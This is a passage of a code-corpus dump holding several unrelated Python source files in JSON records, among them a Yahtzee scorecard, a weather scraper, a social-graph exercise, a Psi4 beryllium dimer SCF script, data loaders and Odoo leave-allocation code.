_on_radio_toggled(self,key):\n def f(widget):\n if self.radio_buttons[key].get_active():\n self.key = key\n else:\n pass\n return f\n\n def attach(self,grid,iLine):\n for i,key in enumerate(UPPER_KEYS):\n grid.attach(self.radio_buttons[key],0,iLine+i,1,1)\n grid.attach(self.score_labels [key],1,iLine+i,1,1)\n for i,key in enumerate(LOWER_KEYS):\n grid.attach(self.radio_buttons[key],2,iLine+i,1,1)\n grid.attach(self.score_labels [key],3,iLine+i,1,1)\n jLine = iLine+max(len(LOWER_KEYS),len(UPPER_KEYS))+1\n for i,key in enumerate(UPPER_SPECIAL_KEYS):\n grid.attach(self.special_labels[key],0,jLine+i,1,1)\n grid.attach(self.score_labels [key],1,jLine+i,1,1)\n for i,key in enumerate(LOWER_SPECIAL_KEYS):\n grid.attach(self.special_labels[key],2,jLine+i,1,1)\n grid.attach(self.score_labels [key],3,jLine+i,1,1)\n return jLine+max(len(LOWER_SPECIAL_KEYS),len(UPPER_SPECIAL_KEYS))\n\n def roll(self):\n self.n_rolls += 1\n self.window.roll_button.set_n_rolls(self.n_rolls)\n R = Roll(*self.window.dice.values)\n for key in UPPER_KEYS+LOWER_KEYS:\n if self.values[key] < 0:\n self.score_labels[key].set_label(\"(%d)\"%R[key])\n self.dice_values[key] = R[key]\n\n def play(self):\n for key in LOWER_KEYS+UPPER_KEYS:\n if self.values[key] < 0:\n self.score_labels[key].set_label(\"(0)\")\n if self.radio_buttons[key].get_active() and self.n_rolls > 0:\n self.values[key] = self.dice_values[key]\n self.score_labels[key].set_label(str(self.values[key]))\n if key==\"Yahtzee\":\n self.n_bonus_yahtzees += 1\n for key in UPPER_SPECIAL_KEYS+LOWER_SPECIAL_KEYS:\n self.score_labels[key].set_label(str(self.get_special(key)))\n self.n_rolls = 0\n self.window.roll_button.level_bar.set_value(self.n_rolls)\n \n\n def clear(self):\n pass\n","sub_path":"Yahtzee/ScoreCard.py","file_name":"ScoreCard.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"525758119","text":"import glob\n\nimport yaml_config as yc\nfrom pavilion.result import parsers\n\n\nclass Filecheck(parsers.ResultParser):\n \"\"\"Checks the working directory for a given file.\n The parser will tell the user if the filename exists or not. \"\"\"\n\n def __init__(self):\n super().__init__(\n name='filecheck',\n description=\"Checks working directory for a given file. 
Globs are\"\n                        \" accepted.\",\n            config_elems=[\n                yc.StrElem(\n                    'filename', required=True,\n                    help_text=\"Filename to find in working directory.\"\n                )\n            ]\n        )\n\n    def __call__(self, test, file, filename=None):\n\n        return bool(glob.glob((test.path / 'build' / filename).as_posix()))\n","sub_path":"lib/pavilion/plugins/results/filecheck.py","file_name":"filecheck.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"547763792","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.optimize\nimport csv\nimport os\nfrom datetime import date\nfrom pymongo import MongoClient, ASCENDING\nfrom scipy.optimize import leastsq\nclient = MongoClient('mongodb://localhost:27017/')\n\ndb_corona = client.corona\ncol_system = db_corona.system_info\ncol_case = db_corona.case_count\ncol_ridership = db_corona.ridership\n\ncol_occu = db_corona.census_race\n\nrl_system = col_system.find({})\nfor each_system in rl_system:\n    system_name = each_system[\"name\"]\n    county_FIPS = each_system[\"county_FIPS\"]\n    if county_FIPS == None:\n        continue\n\n    rl_occu = col_occu.find_one({\"Geo_FIPS\": str(int(county_FIPS))})\n    # print(rl_occu)\n    try:\n        a1 = rl_occu[\"white_pop\"]\n\n        a2 = rl_occu[\"asian_pop\"]\n\n        a0 = rl_occu[\"total_race_pop\"]\n    except:\n        print(county_FIPS)\n        continue\n    print('\"', system_name ,'\"', a1, a2, a0)","sub_path":"scr/corr_analysis/print_race.py","file_name":"print_race.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"115412429","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import CityItem\nfrom scrapy.selector import Selector\nimport re\nfrom scrapy.http import Request\nfrom pypinyin import lazy_pinyin\n\nclass TianqispiderSpider(scrapy.Spider):\n    name = 'tianqispider'\n    # allowed_domains = ['weather.com.cn']\n    provinces = '河北、山西、吉林、辽宁、黑龙江、陕西、甘肃、青海、山东省、福建、浙江、台湾、河南、湖北、湖南、江西、江苏、安徽、广东、海南、四川、贵州、云南、' \\\n                '北京、上海、天津、重庆、' \\\n                '内蒙古、新疆、宁夏、广西、西藏'\n    provinces = provinces.split('、')\n    provinces = list(map(lazy_pinyin, provinces))\n    provinces = [''.join(p) for p in provinces]\n    provinces.append('shaanxi') #陕西\n    start_urls = ['http://www.weather.com.cn/{}/index.shtml'.format(p) for p in provinces]\n    #http://www.weather.com.cn/neimenggu/index.shtml\n\n    def parse(self, response):\n        selector = Selector(response)\n        cities = selector.xpath('//div[@class=\"forecastBox\"]/dl')\n        for city in cities:\n            city_url = city.xpath('./dt/a/@href').extract()[0]\n            city_name = city.xpath('./dt/a/text()').extract()[0]\n            yield Request(city_url,\n                          callback=self.parse_city,\n                          meta={'city_name': city_name})\n\n    def parse_city(self,response):\n        selector = Selector(response)\n        item = CityItem()\n        item['city_name'] = response.meta['city_name']\n        item['high_temperature'] = selector.xpath('//ul[@class=\"t clearfix\"]/li[1]/p[2]/span/text()').extract()[0]\n        item['low_temperature'] = selector.xpath('//ul[@class=\"t clearfix\"]/li[1]/p[2]/i/text()').extract()[0]\n        item['city_province'] = selector.xpath('//div[@class=\"crumbs fl\"]/a[1]/text()').extract()[0]\n        item['city_weather'] = selector.xpath('//ul[@class=\"t clearfix\"]/li[1]/p/text()').extract()[0]\n        yield item\n","sub_path":"tianqi/tianqi/spiders/tianqispider.py","file_name":"tianqispider.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"249847113","text":"# -*- coding: utf-8 
-*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\nimport image_cropping.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PhotoInstagram',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('image_field', image_cropping.fields.ImageCropField(upload_to='image/')),\n ('cropping', image_cropping.fields.ImageRatioField('image_field', '120x100', free_crop=False, verbose_name='cropping', size_warning=False, adapt_rotation=False, hide_image_field=False, allow_fullsize=True, help_text=None)),\n ('cropping_free', image_cropping.fields.ImageRatioField('image_field', '300x230', free_crop=True, verbose_name='cropping free', size_warning=True, adapt_rotation=False, hide_image_field=False, allow_fullsize=False, help_text=None)),\n ('title', models.CharField(null=True, blank=True, max_length=120)),\n ('created', models.DateTimeField(auto_now=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='uploader')),\n ],\n ),\n ]\n","sub_path":"instaapp/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104813841","text":"import random\nfrom itertools import permutations\nfrom util import Stack, Queue\nclass User:\n def __init__(self, name):\n self.name = name\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n Creates that number of users and a randomly distributed friendships\n between those users.\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! 
IMPLEMENT ME\n        # Add users\n        ## use num_users\n        user_ids = []\n        for user in range(num_users):\n            self.add_user(random.randint(1, num_users * 100))\n        for user in self.users:\n            user_ids.append(user)\n        perms = list(permutations(user_ids, 2))\n        final_list = random.sample(perms, num_users * avg_friendships // 2)\n        for pair in final_list:\n            self.add_friendship(pair[0], pair[1])\n    def get_all_social_paths(self, user_id):\n        \"\"\"\n        Takes a user's user_id as an argument\n        Returns a dictionary containing every user in that user's\n        extended network with the shortest friendship path between them.\n        The key is the friend's ID and the value is the path.\n        \"\"\"\n        visited = {}  # Note that this is a dictionary, not a set\n        visited[user_id] = [user_id]\n        paths = []\n        for friend in self.get_friendships(user_id):\n            paths.append(self.dft_search(friend))\n        extended_network = []\n        for path in paths:\n            for i in path:\n                for j in i:\n                    if j not in extended_network:\n                        extended_network.append(j)\n        extended_network_paths = []\n        for end_user_id in extended_network:\n            extended_network_paths.append(self.bft_search(user_id, end_user_id))\n        print(extended_network_paths)\n        for i in extended_network_paths:\n            for extended_network in i:\n                visited[extended_network[-1]] = extended_network\n        return visited\n    def get_friendships(self, user_id):\n        return self.friendships[user_id]\n    def dft_search(self, user_id):\n        # returns extended network\n        s = Stack()\n        visited = {}\n        connections = []\n        if s.size() == 0:\n            s.push([user_id])\n        while s.size() > 0:\n            current_path = s.pop()\n            current_user_id = current_path[-1]\n            if current_user_id not in visited:\n                visited[current_user_id] = current_path\n                if len(self.get_friendships(current_user_id)) == 1:\n                    connections.append(current_path)\n                else:\n                    for friend in self.get_friendships(current_user_id):\n                        if friend not in visited:\n                            new_path = current_path + [friend]\n                            visited[friend] = new_path\n                            s.push(new_path)\n        return connections\n    def bft_search(self, start_user_id, end_user_id):\n        # return shortest path\n        q = Queue()\n        visited = set()\n        paths = []\n        q.enqueue([start_user_id])\n        while q.size() > 0:\n            path = q.dequeue()\n            current_friend = path[-1]\n            if current_friend not in visited:\n                visited.add(current_friend)\n                for friend_of_friend in self.get_friendships(current_friend):\n                    new_path = path + [friend_of_friend]\n                    q.enqueue(new_path)\n                if current_friend == end_user_id:\n                    paths.append(path)\n        shortest_path = [path for path in paths if len(path) == min(len(x) for x in paths)]\n        return shortest_path\nif __name__ == '__main__':\n    sg = SocialGraph()\n    sg.populate_graph(10, 2)\n    print(sg.friendships)\n    connections = sg.get_all_social_paths(1)\n    print(connections)","sub_path":"projects/social/helping_Arin.py","file_name":"helping_Arin.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"45696133","text":"import cx_Oracle\r\nimport xlrd\r\n\r\n# --------------------------------------\r\n# Reio: Read Excel import into Oracle Database\r\n# --------------------------------------\r\n'''\r\ncreate table NIIC_TEMP\r\n(\r\n  cust_no VARCHAR2(20),\r\n  CustomerName VARCHAR2(100),\r\n  country VARCHAR2(20),\r\n  Status VARCHAR2(20),\r\n  Ebanking VARCHAR2(20),\r\n  RM VARCHAR2(50)\r\n)\r\n'''\r\n# for database tables: NIIC_TEMP\r\n\r\nclass REIOD(object):\r\n    def ImportFXdata(self,filename,tablename):\r\n\r\n        data = xlrd.open_workbook(filename)\r\n        table = data.sheets()[0]\r\n        nrows = table.nrows\r\n        drows=[]\r\n        
for i in range(nrows):\r\n if i+1')\r\n\tEN = Field(lower=True,tokenize=tokenize,eos_token='',init_token='')\r\n\r\n\ttrain_ds = TabularDataset(train_path,'tsv',[('en',EN),('de',DE)],skip_header=True)\r\n\tval_ds = TabularDataset(val_path,'tsv',[('en',EN),('de',DE)],skip_header=True)\r\n\r\n\ttrain_iter = BucketIterator(train_ds,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.en),len(x.de)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\tvalid_iter = BucketIterator(val_ds,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.en),len(x.de)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\r\n\tDE.build_vocab(train_ds.de)\r\n\tEN.build_vocab(train_ds.en)\r\n\r\n\treturn train_iter, valid_iter, DE, EN\r\n\r\ndef load_WMT14(bs):\r\n\tdata_path = 'data/WMT14/processed/train.cs_en.sample.tsv'\r\n\r\n\tto_delete = [r'"',r''']\r\n\r\n\tdef tokenize(text):\r\n\t for p in to_delete:\r\n\t text = re.sub(p,'',text)\r\n\t text = text.translate(str.maketrans('', '', string.punctuation))\r\n\t text = re.sub(r'\\d+',r'num',text)\r\n\t return [x.text for x in tok(text) if x.text != ' ']\r\n\r\n\tCZ = Field(lower=True,tokenize=tokenize,eos_token='')\r\n\tEN = Field(lower=True,tokenize=tokenize,eos_token='',init_token='')\r\n\r\n\tdata_ds = TabularDataset(data_path,'tsv',[('src',CZ),('trg',EN)],skip_header=True)\r\n\ttrain,valid = data_ds.split(split_ratio=0.8)\r\n\r\n\ttrain_iter = BucketIterator(train,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.src),len(x.trg)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\tvalid_iter = BucketIterator(valid,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.src),len(x.trg)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\r\n\tCZ.build_vocab(data_ds.src,min_freq=2)\r\n\tEN.build_vocab(data_ds.trg,min_freq=3)\r\n\r\n\treturn train_iter, valid_iter, CZ, EN","sub_path":"src/data/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306048925","text":"import os\nimport numpy as np\n\nclass dataRebuild():\n def __init__(self, dataFileName,trainRatio = 0.7, testRatio = 0.15):\n self.DFName = dataFileName\n self.TraR = trainRatio\n self.TesR = testRatio\n self.ValR = 1 - (trainRatio + testRatio)\n self.loadData()\n self.creatTrainData()\n self.creatTestData()\n self.creatValidationData()\n\n #加载数据\n def loadData(self):\n self.Data = np.loadtxt(self.DFName)\n print(self.Data[0, :])\n self.dataNum_H = self.Data.shape[0]\n self.dataNum_D = self.Data.shape[1]\n\n #创建训练集\n def creatTrainData(self):\n if self.TraR >0 :\n self.trainData_H = int(self.dataNum_H * self.TraR)\n file = open('trainData.txt', 'w')\n for i in self.Data[0 : self.trainData_H, :]:\n for j in i :\n file.write('%.2f'%j + '\\t')\n file.write('\\n')\n file.close()\n print('Train data OK! SHAPE :[%s, %s]\\n'%(self.trainData_H, self.dataNum_D))\n else:\n print('No train data! \\n')\n\n # #创建测试集\n def creatTestData(self):\n if self.TesR > 0:\n self.testData_H = int(self.dataNum_H * self.TesR)\n file = open('testData.txt', 'w')\n for i in self.Data[self.trainData_H : self.trainData_H + self.testData_H, :]:\n for j in i :\n file.write('%.2f'%j + '\\t')\n file.write('\\n')\n file.close()\n print('Test data OK! SHAPE :[%s, %s]\\n'%(self.testData_H, self.dataNum_D))\n else:\n print('No test data! 
\\n')\n\n #创建验证集\n def creatValidationData(self):\n if self.ValR > 0:\n self.valData_H = int(self.dataNum_H * self.ValR)\n file = open('valData.txt', 'w')\n for i in self.Data[self.trainData_H + self.testData_H : self.trainData_H + self.testData_H + self.valData_H, :]:\n for j in i :\n file.write('%.2f'%j + '\\t')\n file.write('\\n')\n file.close()\n print('Validation data OK! SHAPE :[%s, %s]\\n'%(self.valData_H, self.dataNum_D))\n else:\n print('No validation data! \\n')\n\n","sub_path":"RNN_NET_19_04_17/Data_Processing.py","file_name":"Data_Processing.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212902241","text":"# (C) Copyright 2018 Anthony D. Dutoi\n# \n# This file is part of Qode.\n# \n# Qode is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# Qode is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with Qode. If not, see .\n#\n\n# Usage (within a Psi4 conda environment): python main.py \n\nimport sys\nimport numpy\nimport psi4\nimport qode.atoms.integrals.spatial_to_spin as spatial_to_spin\nimport qode.atoms.integrals.external_engines.psi4_ints as integrals\nfrom qode.many_body.self_consistent_field.fermionic import RHF_RoothanHall_Nonorthogonal\n\ndef MO_transform(H, V, C):\n H = C.T @ H @ C\n for _ in range(4): V = numpy.tensordot(V, C, axes=([0],[0])) # cycle through the tensor axes (this assumes everything is real)\n return H, V\n\n\n\n# Normal AO SCF of Be atom\nn_elec_1 = 4\nBe_1 = \"\"\"\\\nBe\n\"\"\"\nS_1, T_1, U_1, V_1, X_1 = integrals.AO_ints(Be_1, \"6-31G\")\nH_1 = T_1 + U_1\n_, _, C_1 = RHF_RoothanHall_Nonorthogonal(n_elec_1, (S_1,H_1,V_1), thresh=1e-12)\nH_1_MO, V_1_MO = MO_transform(H_1, V_1, C_1)\n\n# Set up dimer\nn_elec_2 = 8\nBe_2 = \"\"\"\\\nBe\nBe 1 {distance:f}\n\"\"\".format(distance=float(sys.argv[1]))\nS_2, T_2, U_2, V_2, X_2 = integrals.AO_ints(Be_2, \"6-31G\")\nH_2 = T_2 + U_2\nEnuc_2 = X_2.mol.nuclear_repulsion_energy()\n\n# Psi4 energy of dimer for reference\npsi4.set_output_file(\"output.dat\")\npsi4.set_options({\"scf_type\":\"pk\", \"PRINT_MOS\":\"True\"})\nprint(\"Psi4 Be2 HF energy = \", psi4.energy(\"SCF/6-31G\", molecule=X_2.mol))\n\n# Normal AO SCF Be dimer\nenergy_2, _, C_2 = RHF_RoothanHall_Nonorthogonal(n_elec_2, (S_2,H_2,V_2), thresh=1e-12)\nprint(\"As computed here = \", energy_2 + Enuc_2)\nH_2_MO, V_2_MO = MO_transform(H_2, V_2, C_2)\n\n# Put everything in terms of spin orbitals\nC_1 = spatial_to_spin.one_electron(C_1)\nH_1_MO = spatial_to_spin.one_electron(H_1_MO)\nV_1_MO = spatial_to_spin.two_electron(V_1_MO)\nS_2 = spatial_to_spin.one_electron(S_2)\nC_2 = spatial_to_spin.one_electron(C_2)\nH_2_MO = spatial_to_spin.one_electron(H_2_MO)\nV_2_MO = spatial_to_spin.two_electron(V_2_MO)\n\n# Dump to disk\nnumpy.save( \"data/Be_C.npy\", C_1)\nnumpy.save( \"data/Be_h.npy\", H_1_MO)\nnumpy.save( \"data/Be_V.npy\", V_1_MO)\nnumpy.save(\"data/Be2_{}_S.npy\".format(sys.argv[1]), S_2)\nnumpy.save(\"data/Be2_{}_C.npy\".format(sys.argv[1]), C_2)\nnumpy.save(\"data/Be2_{}_h.npy\".format(sys.argv[1]), 
H_2_MO)\nnumpy.save(\"data/Be2_{}_V.npy\".format(sys.argv[1]), V_2_MO)\n","sub_path":"QODE/Applications/GPU-pilot/atomic_states/basis.py","file_name":"basis.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"285304421","text":"print(\"PROGRAM MENGHITUNG NILAI RATA-RATA MENGGUNAKAN FOR\")\n\nn = int(input(\"\\nBanyaknya Data: \"))\n\nprint() #Membuat baris baru\ndata = []\njum = 0\n\nfor i in range(0, n):\n temp = int(input(\"Masukkan data ke-%d: \" % (i+1)))\n data.append(temp)\n jum += data[i]\n rata2 = jum / n\n\nprint(\"\\nRata-rata = %0.2f\" % rata2)","sub_path":"I0320021_Soal2_Tugas6.py","file_name":"I0320021_Soal2_Tugas6.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"218045384","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\ncli.py\n\nCopyleft (C) 2017 Magnus Lindström \n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU Affero General Public License as published by the Free\nSoftware Foundation, either version 3 of the License, or (at your option) any\nlater version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\n\nYou should have received a copy of the GNU Affero General Public License along\nwith this program. If not, see .\n\n\"\"\"\n# Standard libs\nfrom optparse import OptionParser\n\nparser = OptionParser(usage=\"usage: %prog [options] argument\", version=\"%prog 0.1\")\n\n\ndef cli(parser):\n\n parser.add_option(\"-p\", \"--path\", dest=\"path\", help=\"Path to base directory.\")\n parser.add_option(\"-f\", \"--file\", dest=\"file\", help=\"Name of file.\")\n parser.add_option(\"-n\", \"--name\", dest=\"name\", help=\"Name of project\")\n parser.add_option(\"-e\", \"--env\", dest=\"enviroment\", help=\"Specify which python enviroment to use.\")\n (options, args) = parser.parse_args()\n\n arg = vars(options)\n pwd = str(arg[\"path\"])\n fname = str(arg[\"file\"])\n project_name = str(arg[\"name\"])\n version = str(arg[\"enviroment\"])\n if arg[\"enviroment\"]==None:\n version = \"\"\n\n pwd = \"{}/\".format(pwd)\n\n return pwd, fname, project_name, version\n\n\n","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67690007","text":"def inversia(x,y):\n a=pygame.display.set_mode((x,y))\n root=tkinter.Tk()\n label=tkinter.Label(text='0%')\n label.pack()\n global image\n global proc1\n a.blit(image,(0,0))\n pygame.display.update()\n for i in range(0,x):\n for j in range(0,y):\n color=a.get_at((i,j))\n a.set_at((i,j),(255-color[0],255-color[1],255-color[2]))\n proc=((i+1)*y)//proc1\n label['text']=str(proc)+\"%\"\n root.update()\n label['text'] = \"100%\"\n root.update()\ndef black_white(x,y):\n a=pygame.display.set_mode((x,y))\n root = tkinter.Tk()\n label = tkinter.Label(text='0%')\n label.pack()\n global image\n global proc1\n a.blit(image,(0,0))\n pygame.display.update()\n for i in range(0,x):\n for j in range(0,y):\n color = a.get_at((i, j))\n t=(color[0]+color[1]+color[2])//3\n a.set_at((i, j), (t,t,t))\n proc = ((i+1) * y) // proc1\n label['text'] = str(proc) + \"%\"\n 
root.update()\n label['text'] = \"100%\"\n root.update()\ndef piksel(x,y):\n pygame.display.quit()\n global image\n global proc1\n l=int(input(\"на сколько пикселей будет 1 пиксель?\"))\n a=pygame.display.set_mode((x,y))\n a.blit(image, (0, 0))\n pygame.display.update()\n root = tkinter.Tk()\n label = tkinter.Label(text='0%')\n label.pack()\n e=x\n r=y\n for i in range(0, e, l):\n for j in range(0, r, l):\n b = []\n R = 0\n B = 0\n G = 0\n for k in range(i, i + l):\n for n in range(j, j + l):\n try:\n m = a.get_at((k, n))\n b.append(m)\n R += m[0]\n G += m[1]\n B += m[2]\n except:\n pass\n if e - i >= l and r - j >= l:\n R //= l * l\n B //= l * l\n G //= l * l\n elif e - i >= l:\n R //= l * (r - j)\n B //= l * (r - j)\n G //= l * (r - j)\n elif r - j >= l:\n R //= (e - i) * l\n B //= (e - i) * l\n G //= (e - i) * l\n else:\n R //= (e - i) * (r - j)\n B //= (e - i) * (r - j)\n G //= (e - i) * (r - j)\n for k in range(i, i + l):\n for n in range(j, j + l):\n try:\n a.set_at((k, n), (R, G, B))\n except:\n pass\n proc = ((i + 1) * y) // proc1\n label['text'] = str(proc) + \"%\"\n root.update()\n label['text'] = \"100%\"\n root.update()\nimport pygame\n\nimport tkinter\n\nimage_name=input(\"Введите название изображения, которое нужно отредактировать:\")\ntry:\n image = pygame.image.load(image_name)\nexcept:\n print(\"Такого файла не существует!\")\nelse:\n x=-1\n y=-1\n w=str(image)\n e=''\n for i in range(9,len(w)-5):\n if w[i]==\"x\":\n if x==-1:\n x=int(e)\n elif y==-1:\n y=int(e)\n e = ''\n else:e+=w[i]\n proc1=x*y//100\n a=pygame.display.set_mode((1000,500))\n game.write(a, \"что вы хотите сделать с этим изображением?\", (255, 255, 255), (10, 10), 50)\n commands=['инверсия','черно белый','пиксельная']\n for i in range(50,500,50):\n pygame.draw.line(a,(255,255,255),(0,i),(1000,i))\n for i in range(len(commands)):\n game.write(a,commands[i],(255,255,255),(10,i*50+110),50)\n pygame.display.update()\n h=1\n while h:\n for event in pygame.event.get():\n if event.type==pygame.MOUSEBUTTONDOWN:\n pos=game.mouse_pos()\n h=0\n if 100 (365 * 2) and (today_date - joining_date).days <= (365 * 8) and int(self.no_of_days + leave_days) != 14:\n# if leave_days > 0.0:\n# reason = ('The leave is already allocated to (Employee Name). If you wish to change the allocation, please refuse the allocated leave, Reset it to Draft and proceed with the changes.')\n# else:\n# reason = ('Leave allocation should be 14 days for the employees equal or greater than 2 years of service.')\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 14 days for two year experiance Employee for %s Employee') % (emp.name))\n# if (today_date - joining_date).days > (365 * 8) and int(self.no_of_days + leave_days) != 21:\n# if leave_days > 0.0:\n# reason = ('The leave is already allocated to (Employee Name). 
If you wish to change the allocation, please refuse the allocated leave, Reset it to Draft and proceed with the changes.')\n# else:\n# reason = ('Leave allocation should be 21 days for the employees equal or greater than 8 years of service.')\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 21 days for eight year experiance Employee for %s Employee') % (emp.name))\n# \n# if self.holiday_status_id.name == 'CCL':\n# for emp in self.employee_ids:\n# holiday_ids = self.env['hr.holidays'].search([('employee_id', '=', emp.id),\n# ('type', '=', 'add'),\n# ('holiday_status_id', '=', self.holiday_status_id.id),\n# ('hr_year_id', '=', self.fiscal_year_id.id),\n# ])\n# leave_days = 0\n# for holiday in holiday_ids:\n# leave_days += holiday.number_of_days_temp\n# \n# temp = emp.dependent_ids and emp.dependent_ids[0].birth_date\n# if temp:\n# temp = datetime.datetime.strptime(temp, DEFAULT_SERVER_DATE_FORMAT).date()\n# for dependent in emp.dependent_ids:\n# birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if birth > temp:\n# temp = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if temp:\n# to_date = datetime.datetime.strptime(fields.Date.today() + \" 00:00:00\", DEFAULT_SERVER_DATETIME_FORMAT).date()\n# temp = temp + relativedelta(years=7)\n# \n# if emp.singaporean:\n# if to_date > temp:\n# reason = ('Child should below 7 year old, of %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Child should below 7 year old, of %s Employee') % (emp.name))\n# if int(self.no_of_days + leave_days) != 7:\n# reason = ('You can allocate 7 days for CCL Leave for %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 7 days for CCL Leave for %s Employee') % (emp.name))\n# if not emp.singaporean:\n# if to_date > temp:\n# reason = ('Child should below 7 year old, of %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Child should below 7 year old, of %s Employee') % (emp.name))\n# if int(self.no_of_days + leave_days) != 2:\n# reason = ('You can allocate 2 days for CCL Leave for %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 2 days for CCL Leave for %s Employee') % (emp.name))\n# else:\n# reason = ('Employee %s does not have configure Child.') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Employee %s does not have configure Child.') % (emp.name))\n# \n# if self.holiday_status_id.name == 'ECCL':\n# for emp in self.employee_ids:\n# if emp.singaporean:\n# holiday_ids = self.env['hr.holidays'].search([('employee_id', '=', emp.id),\n# ('type', '=', 'add'),\n# ('holiday_status_id', '=', self.holiday_status_id.id),\n# ('hr_year_id', '=', self.fiscal_year_id.id),\n# ])\n# leave_days = 0\n# for holiday 
